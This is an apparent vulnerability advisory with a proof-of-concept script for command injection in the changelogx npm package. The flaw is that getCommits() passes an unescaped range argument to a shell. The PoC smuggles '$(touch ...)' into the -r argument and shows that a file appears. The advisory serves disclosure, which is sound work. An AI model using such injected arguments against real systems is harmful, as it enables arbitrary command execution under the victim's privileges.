The git_helper.getCommits() function in the changelogx package builds a git log
command from its $range argument and runs that command through a shell. The
range is neither validated nor escaped, so shell metacharacters placed in
$range (for example ; or $(...)) let the caller inject and execute arbitrary
other OS commands alongside the intended git log.
# PoC.sh
npm i changelogx -g
git clone https://github.com/royriojas/changelogx.git
cd changelogx
ls
# pzhou@shu is not present yet
# The single quotes keep the invoking shell from expanding $(...), so the
# payload reaches changelogx literally as part of the range argument.
changelogx -r '1.0..;$(touch pzhou@shu)' -o changelog.html
ls
# pzhou@shu now exists: the touch inside $(...) ran as an OS command
This vulnerability lets whoever controls the -r argument passed to changelogx execute arbitrary OS commands with the privileges of the user running changelogx.